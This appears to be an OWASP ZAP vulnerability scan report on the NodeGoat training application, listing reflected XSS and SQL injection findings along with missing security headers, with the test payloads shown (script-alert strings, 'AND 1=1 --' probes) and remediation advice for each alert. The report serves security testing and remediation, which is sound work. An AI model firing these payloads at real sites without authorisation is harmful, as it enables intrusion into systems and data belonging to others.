96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 |
High (Medium)Cross Site Scripting (Reflected)
Description

Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.

There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.

Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

URLhttp://nodegoat.herokuapp.com/signup
MethodPOST
ParameteruserName
Attack"><script>alert(1);</script>
Evidence"><script>alert(1);</script>
URLhttp://nodegoat.herokuapp.com/signup
MethodPOST
Parameteremail
Attack"><script>alert(1);</script>
Evidence"><script>alert(1);</script>
Instances2
Solution

Phase: Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Phase: Implementation

For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

Reference

http://projects.webappsec.org/Cross-Site-Scripting

http://cwe.mitre.org/data/definitions/79.html

CWE Id79
WASC Id8
Source ID1
185 |
186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | 251 | 252 | 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | 266 | 267 | 268 | 269 | 270 | 271 | 272 | 273 |
High (Medium)SQL Injection
Description

SQL injection may be possible.

URLhttp://nodegoat.herokuapp.com/login
MethodPOST
ParameteruserName
AttackZAP AND 1=1 --
URLhttp://nodegoat.herokuapp.com/signup
MethodPOST
ParameteruserName
AttackZAP AND 1=1 --
Instances2
Solution

Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply a 'whitelist' of allowed characters, or a 'blacklist' of disallowed characters in user input.

Apply the principle of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.

Other information

The page results were successfully manipulated using the boolean conditions [ZAP AND 1=1 -- ] and [ZAP AND 1=2 -- ]

The parameter value being modified was NOT stripped from the HTML output for the purposes of the comparison

Data was returned for the original parameter.

The vulnerability was detected by successfully restricting the data originally returned, by manipulating the parameter

Reference

https://www.owasp.org/index.php/Top_10_2010-A1

https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

CWE Id89
WASC Id19
Source ID1
274 |
275 | 276 | 277 | 278 | 279 | 280 | 281 | 282 | 283 | 284 | 285 | 286 | 287 | 288 | 289 | 290 | 291 | 292 | 293 | 294 | 295 | 296 | 297 | 298 | 299 | 300 | 301 | 302 | 303 | 304 | 305 | 306 | 307 | 308 | 309 | 310 | 311 | 312 | 313 | 314 | 315 | 316 | 317 | 318 | 319 | 320 | 321 | 322 | 323 | 324 | 325 | 326 | 327 | 328 | 329 | 330 | 331 | 332 | 333 | 334 | 335 | 336 | 337 | 338 | 339 | 340 | 341 |
High (Low)Cross Site Scripting (Reflected)
Description

Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.

There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.

Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.

URLhttp://nodegoat.herokuapp.com/login
MethodPOST
ParameteruserName
Attack'"<script>alert(1);</script>
Evidence'"<script>alert(1);</script>
Instances1
Solution

Phase: Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Phase: Implementation

For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

Reference

http://projects.webappsec.org/Cross-Site-Scripting

http://cwe.mitre.org/data/definitions/79.html

CWE Id79
WASC Id8
Source ID1
342 |
343 | 344 | 345 | 346 | 347 | 348 | 349 | 350 | 351 | 352 | 353 | 354 | 355 | 356 | 357 | 358 | 359 | 360 | 361 | 362 | 363 | 364 | 365 | 366 | 367 | 368 | 369 | 370 | 371 | 372 | 373 | 374 | 375 | 376 | 377 | 378 | 379 | 380 | 381 | 382 | 383 | 384 | 385 | 386 | 387 | 388 | 389 | 390 | 391 | 392 | 393 | 394 | 395 | 396 | 397 | 398 | 399 | 400 | 401 | 402 | 403 | 404 | 405 | 406 | 407 | 408 | 409 | 410 | 411 | 412 | 413 | 414 | 415 | 416 | 417 | 418 | 419 | 420 | 421 | 422 | 423 | 424 | 425 | 426 | 427 | 428 | 429 | 430 | 431 | 432 | 433 | 434 | 435 | 436 | 437 | 438 | 439 | 440 | 441 | 442 | 443 | 444 | 445 | 446 | 447 | 448 | 449 | 450 | 451 | 452 | 453 | 454 | 455 | 456 | 457 | 458 | 459 | 460 | 461 | 462 | 463 | 464 | 465 | 466 | 467 | 468 | 469 | 470 | 471 | 472 | 473 | 474 | 475 | 476 | 477 | 478 | 479 | 480 | 481 | 482 | 483 | 484 | 485 | 486 | 487 | 488 | 489 | 490 | 491 | 492 | 493 | 494 | 495 | 496 | 497 | 498 | 499 | 500 | 501 | 502 | 503 | 504 | 505 | 506 | 507 | 508 | 509 | 510 | 511 | 512 | 513 | 514 | 515 | 516 | 517 | 518 | 519 | 520 | 521 | 522 | 523 | 524 | 525 | 526 | 527 | 528 | 529 | 530 | 531 | 532 | 533 | 534 | 535 | 536 | 537 | 538 | 539 | 540 | 541 | 542 | 543 | 544 | 545 | 546 | 547 | 548 | 549 | 550 | 551 | 552 | 553 | 554 | 555 | 556 | 557 | 558 | 559 | 560 | 561 | 562 | 563 | 564 | 565 | 566 | 567 | 568 | 569 | 570 | 571 | 572 | 573 | 574 | 575 | 576 | 577 | 578 | 579 | 580 | 581 | 582 | 583 | 584 | 585 | 586 | 587 | 588 | 589 | 590 | 591 | 592 | 593 | 594 | 595 | 596 | 597 | 598 | 599 | 600 | 601 | 602 | 603 | 604 | 605 | 606 | 607 | 608 | 609 | 610 | 611 | 612 | 613 | 614 | 615 | 616 | 617 | 618 | 619 | 620 | 621 | 622 | 623 | 624 | 625 | 626 | 627 | 628 | 629 | 630 | 631 | 632 | 633 | 634 | 635 | 636 | 637 | 638 | 639 | 640 | 641 | 642 | 643 | 644 | 645 | 646 | 647 | 648 | 649 | 650 | 651 | 652 | 653 | 654 | 655 | 656 | 657 | 658 | 659 | 660 | 661 | 662 | 663 | 664 | 665 | 666 | 667 |
Medium (Medium)X-Frame-Options Header Not Set
Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URLhttp://nodegoat.herokuapp.com/dashboard
MethodGET
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/tutorial/a3
MethodGET
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/tutorial/redos
MethodGET
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/benefits
MethodGET
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/profile
MethodGET
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/tutorial/a4
MethodGET
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/tutorial/a1
MethodGET
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/tutorial/a9
MethodGET
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/signup
MethodGET
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/tutorial/a2
MethodGET
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/signup
MethodPOST
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/allocations/6
MethodGET
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/tutorial/a7
MethodGET
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/memos
MethodGET
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/tutorial/a10
MethodGET
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/tutorial/a8
MethodGET
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/login
MethodGET
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/contributions
MethodGET
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/tutorial/a5
MethodGET
ParameterX-Frame-Options
URLhttp://nodegoat.herokuapp.com/tutorial
MethodGET
ParameterX-Frame-Options
Instances21
Solution

Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. ALLOW-FROM allows specific websites to frame the web page in supported web browsers).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx

CWE Id16
WASC Id15
Source ID3
668 |
669 | 670 | 671 | 672 | 673 | 674 | 675 | 676 | 677 | 678 | 679 | 680 | 681 | 682 | 683 | 684 | 685 | 686 | 687 | 688 | 689 | 690 | 691 | 692 | 693 | 694 | 695 | 696 | 697 | 698 | 699 | 700 | 701 | 702 | 703 | 704 | 705 | 706 | 707 | 708 | 709 | 710 | 711 | 712 | 713 | 714 | 715 | 716 | 717 | 718 | 719 | 720 | 721 | 722 | 723 | 724 | 725 | 726 | 727 |
Medium (Medium)Application Error Disclosure
Description

This page contains an error/warning message that may disclose sensitive information like the location of the file that produced the unhandled exception. This information can be used to launch further attacks against the web application. The alert could be a false positive if the error message is found inside a documentation page.

URLhttp://nodegoat.herokuapp.com/tutorial/a9%23npm%20outdated
MethodGET
EvidenceHTTP/1.1 500 Internal Server Error
Instances1
Solution

Review the source code of this page. Implement custom error pages. Consider implementing a mechanism to provide a unique error reference/identifier to the client (browser) while logging the details on the server side and not exposing them to the user.

Reference

CWE Id200
WASC Id13
Source ID3
728 |
729 | 730 | 731 | 732 | 733 | 734 | 735 | 736 | 737 | 738 | 739 | 740 | 741 | 742 | 743 | 744 | 745 | 746 | 747 | 748 | 749 | 750 | 751 | 752 | 753 | 754 | 755 | 756 | 757 | 758 | 759 | 760 | 761 | 762 | 763 | 764 | 765 | 766 | 767 | 768 | 769 | 770 | 771 | 772 | 773 | 774 | 775 | 776 | 777 | 778 | 779 | 780 | 781 | 782 | 783 | 784 | 785 | 786 | 787 | 788 | 789 | 790 | 791 | 792 | 793 | 794 |
Low (Medium)X-Content-Type-Options Header Missing
Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

URLhttp://tile-service.weather.microsoft.com/en-US/livetile/preinstall?region=CN&appid=C98EA5B0842DBB9405BBF071E1DA76512D21FE36&FORM=Threshold
MethodGET
ParameterX-Content-Type-Options
Instances1
Solution

Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

Other information

This issue still applies to error type pages (401, 403, 500, etc) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

At "High" threshold this scanner will not alert on client or server error responses.

Reference

http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx

https://www.owasp.org/index.php/List_of_useful_HTTP_headers

CWE Id16
WASC Id15
Source ID3
795 |
796 | 797 | 798 | 799 | 800 | 801 | 802 | 803 | 804 | 805 | 806 | 807 | 808 | 809 | 810 | 811 | 812 | 813 | 814 | 815 | 816 | 817 | 818 | 819 | 820 | 821 | 822 | 823 | 824 | 825 | 826 | 827 | 828 | 829 | 831 | 832 | 833 | 834 | 835 | 836 | 837 | 838 | 839 | 840 | 841 | 842 | 843 | 844 | 845 | 846 | 847 | 848 | 880 | 881 | 882 | 883 | 884 | 885 | 886 | 887 | 888 | 889 | 890 | 891 | 892 | 893 | 894 | 895 | 896 | 897 | 899 | 900 | 901 | 902 | 903 | 904 | 905 | 906 | 907 | 908 | 909 | 910 | 911 | 912 | 913 | 914 | 915 | 916 | 918 | 919 | 920 | 921 | 922 | 923 | 924 | 925 | 926 | 927 | 928 | 929 | 930 | 931 | 932 | 933 | 934 | 935 | 937 | 938 | 939 | 940 | 941 | 942 | 943 | 944 | 945 | 946 | 947 | 948 | 949 | 950 | 951 | 952 | 953 | 954 | 956 | 957 | 958 | 959 | 960 | 961 | 962 | 963 | 964 | 965 | 966 | 967 | 968 | 969 | 970 | 971 | 972 | 973 | 975 | 976 | 977 | 978 | 979 | 980 | 981 | 982 | 983 | 984 | 985 | 986 | 987 | 988 | 989 | 990 | 991 | 992 | 994 | 995 | 996 | 997 | 998 | 999 | 1000 | 1001 | 1002 | 1003 | 1004 | 1005 | 1006 | 1007 | 1008 | 1009 | 1010 | 1011 | 1013 | 1014 | 1015 | 1016 | 1017 | 1018 | 1019 | 1020 | 1021 | 1022 | 1023 | 1024 | 1025 | 1026 | 1027 | 1028 | 1029 | 1030 | 1032 | 1033 | 1034 | 1035 | 1036 | 1037 | 1038 | 1039 | 1040 | 1041 | 1042 | 1043 | 1044 | 1045 | 1046 | 1047 | 1048 | 1049 | 1051 | 1052 | 1053 | 1054 | 1055 | 1056 | 1057 | 1058 | 1059 | 1060 | 1061 | 1062 | 1063 | 1064 | 1065 | 1066 | 1067 | 1068 | 1070 | 1071 | 1072 | 1073 | 1074 | 1075 | 1076 | 1077 | 1078 | 1079 | 1080 | 1081 | 1082 | 1083 | 1084 | 1085 | 1086 | 1087 | 1089 | 1090 | 1091 | 1092 | 1093 | 1094 | 1095 | 1096 | 1097 | 1098 | 1099 | 1100 | 1101 | 1102 | 1103 | 1104 | 1105 | 1106 | 1108 | 1109 | 1110 | 1111 | 1112 | 1113 | 1114 | 1115 | 1116 | 1117 | 1118 | 1119 | 1120 | 1121 | 1122 | 1123 | 1124 | 1125 | 1127 | 1128 | 1129 | 1130 | 1131 | 1132 | 1133 | 1134 | 1135 | 1136 | 1137 | 1138 | 1139 | 1140 | 1141 | 1142 | 1143 | 1144 | 1145 | 1146 | 1147 | 1148 | 1149 | 1150 | 1151 | 1152 | 1153 | 1154 | 1155 |
Low (Medium)Cross-Domain JavaScript Source File Inclusion
Description

The page includes one or more script files from a third-party domain.

URLhttp://nodegoat.herokuapp.com/tutorial/a6
MethodGET
Parameterhttp://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence<script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>"); 830 | </script>
URLhttp://nodegoat.herokuapp.com/login
MethodGET
Parameterhttp://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence<script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>"); 849 | 850 | function areCookiesEnabled() { 851 | var cookieEnabled = navigator.cookieEnabled; 852 | 853 | // When cookieEnabled flag is present and false then cookies are disabled. 854 | if (cookieEnabled === false) { 855 | return false; 856 | } 857 | 858 | // try to set a test cookie if we can't see any cookies and we're using 859 | // either a browser that doesn't support navigator.cookieEnabled 860 | // or IE (which always returns true for navigator.cookieEnabled) 861 | if (!document.cookie && (cookieEnabled === null || /*@cc_on!@*/ false)) { 862 | document.cookie = "testcookie=1"; 863 | 864 | if (!document.cookie) { 865 | return false; 866 | } else { 867 | document.cookie = "testcookie=; expires=" + new Date(0).toUTCString(); 868 | } 869 | } 870 | 871 | return true; 872 | } 873 | 874 | $(document).ready(function() { 875 | if (!areCookiesEnabled()) { 876 | $("#page-wrapper").prepend("<div class=\"row\"><div class=\"col-lg-12\"><div class=\"alert alert-danger\">Cookies are not enabled on your browser. Please enable cookies in your browser preferences to continue.</div></div></div>"); 877 | } 878 | }); 879 | </script>
URLhttp://nodegoat.herokuapp.com/tutorial/a10
MethodGET
Parameterhttp://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence<script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>"); 898 | </script>
URLhttp://nodegoat.herokuapp.com/tutorial/a7
MethodGET
Parameterhttp://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence<script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>"); 917 | </script>
URLhttp://nodegoat.herokuapp.com/tutorial/a8
MethodGET
Parameterhttp://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence<script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>"); 936 | </script>
URLhttp://nodegoat.herokuapp.com/signup
MethodPOST
Parameterhttp://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence<script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>"); 955 | </script>
URLhttp://nodegoat.herokuapp.com/tutorial/redos
MethodGET
Parameterhttp://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence<script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>"); 974 | </script>
URLhttp://nodegoat.herokuapp.com/tutorial/a9
MethodGET
Parameterhttp://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence<script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>"); 993 | </script>
URLhttp://nodegoat.herokuapp.com/tutorial/a1
MethodGET
Parameterhttp://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence<script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>"); 1012 | </script>
URLhttp://nodegoat.herokuapp.com/signup
MethodGET
Parameterhttp://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence<script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>"); 1031 | </script>
URLhttp://nodegoat.herokuapp.com/tutorial/a2
MethodGET
Parameterhttp://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence<script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>"); 1050 | </script>
URLhttp://nodegoat.herokuapp.com/tutorial/a3
MethodGET
Parameterhttp://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence<script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>"); 1069 | </script>
URLhttp://nodegoat.herokuapp.com/tutorial/a4
MethodGET
Parameterhttp://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence<script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>"); 1088 | </script>
URLhttp://nodegoat.herokuapp.com/tutorial/a5
MethodGET
Parameterhttp://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence<script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>"); 1107 | </script>
URLhttp://nodegoat.herokuapp.com/tutorial
MethodGET
Parameterhttp://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js
Evidence<script src='http://" + (location.host || "localhost").split(":")[0] + ":35729/livereload.js'></" + "script>"); 1126 | </script>
Instances15
Solution

Ensure JavaScript source files are loaded from only trusted sources, and the sources can't be controlled by end users of the application.

Reference

CWE Id829
WASC Id15
Source ID3
1156 |
1157 | 1158 | 1159 | 1160 | 1161 | 1162 | 1163 | 1164 | 1165 | 1166 | 1167 | 1168 | 1169 | 1170 | 1171 | 1172 | 1173 | 1174 | 1175 | 1176 | 1177 | 1178 | 1179 | 1180 | 1181 | 1182 | 1183 | 1184 | 1185 | 1186 | 1187 | 1188 | 1189 | 1190 | 1191 | 1192 | 1193 | 1194 | 1195 | 1196 | 1197 | 1198 | 1199 | 1200 | 1201 | 1202 | 1203 | 1204 | 1205 | 1206 | 1207 | 1208 | 1209 | 1210 | 1211 | 1212 | 1213 | 1214 | 1215 | 1216 | 1217 | 1218 | 1219 | 1220 | 1221 | 1222 | 1223 | 1224 | 1225 | 1226 | 1227 | 1228 | 1229 | 1230 | 1231 | 1232 | 1233 | 1234 | 1235 | 1236 | 1237 | 1238 | 1239 | 1240 | 1241 | 1242 | 1243 | 1244 | 1245 | 1246 | 1247 | 1248 | 1249 | 1250 | 1251 | 1252 | 1253 | 1254 | 1255 | 1256 | 1257 | 1258 | 1259 | 1260 | 1261 | 1262 | 1263 | 1264 | 1265 | 1266 | 1267 | 1268 | 1269 | 1270 | 1271 | 1272 | 1273 | 1274 | 1275 | 1276 | 1277 | 1278 | 1279 | 1280 | 1281 | 1282 | 1283 | 1284 | 1285 | 1286 | 1287 | 1288 | 1289 | 1290 | 1291 | 1292 | 1293 | 1294 | 1295 | 1296 | 1297 | 1298 | 1299 | 1300 | 1301 | 1302 | 1303 | 1304 | 1305 | 1306 | 1307 | 1308 | 1309 | 1310 | 1311 | 1312 | 1313 | 1314 | 1315 | 1316 | 1317 | 1318 | 1319 | 1320 | 1321 | 1322 | 1323 | 1324 | 1325 | 1326 | 1327 | 1328 | 1329 | 1330 | 1331 | 1332 | 1333 | 1334 | 1335 | 1336 | 1337 | 1338 | 1339 | 1340 | 1341 | 1342 | 1343 | 1344 | 1345 | 1346 | 1347 | 1348 | 1349 | 1350 | 1351 | 1352 | 1353 | 1354 | 1355 | 1356 | 1357 | 1358 | 1359 | 1360 | 1361 | 1362 | 1363 | 1364 | 1365 | 1366 | 1367 | 1368 | 1369 | 1370 | 1371 | 1372 | 1373 | 1374 | 1375 | 1376 | 1377 | 1378 | 1379 | 1380 | 